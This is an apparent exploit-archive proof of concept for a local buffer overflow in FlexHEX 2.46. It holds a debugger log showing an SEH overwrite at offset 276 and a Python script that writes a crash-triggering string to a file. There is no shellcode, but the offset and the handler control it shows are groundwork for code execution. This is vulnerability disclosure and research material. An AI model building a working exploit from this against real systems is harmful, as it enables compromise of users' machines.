FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite)

# Exploit Title: FlexHEX v2.46 - Denial of Service (PoC) and SEH overwritten Crash PoC
# Discovery by: Rafael Pedrero
# Discovery Date: 2018-12-20
# Vendor Homepage: http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1
# Software Link : http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1
# Tested Version: 2.46
# Tested on: Windows XP SP3
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run FlexHEX.exe
# 2.- Go to Menu "Stream" - "New Stream" and copy content of FlexHEX_SEH_Crash.txt to clipboard
# 3.- Paste the content into the field: 'Stream Name:'
# 4.- Click 'OK' button and you will see a crash.


'''
Log data, item 21
 Address=0BADF00D
 Message=    SEH record (nseh field) at 0x0012dde8 overwritten with unicode
pattern : 0x006a0041 (offset 276), followed by 20 bytes of cyclic data
after the handler

SEH chain of main thread
Address    SE handler
0012DDFC   FlexHEX.00420042
00420042   8BC13B2C
4E8B3C46   *** CORRUPT ENTRY ***

EAX 00410041 FlexHEX.00410041
ECX 00000000
EDX 00000000
EBX 0012FA18
ESP 0012DE3C UNICODE "AAAAAAAAAABBBB"
EBP 00410041 FlexHEX.00410041
ESI 0012DE78
EDI 0012E69C
EIP 00410041 FlexHEX.00410041
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 1  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


'''

#!/usr/bin/env python

nseh = "BB"
seh = "BB"

junk = "\x41" * 276
crash = junk + nseh + seh
f = open ("FlexHEX_SEH_Crash.txt", "w")
f.write(crash)
f.close()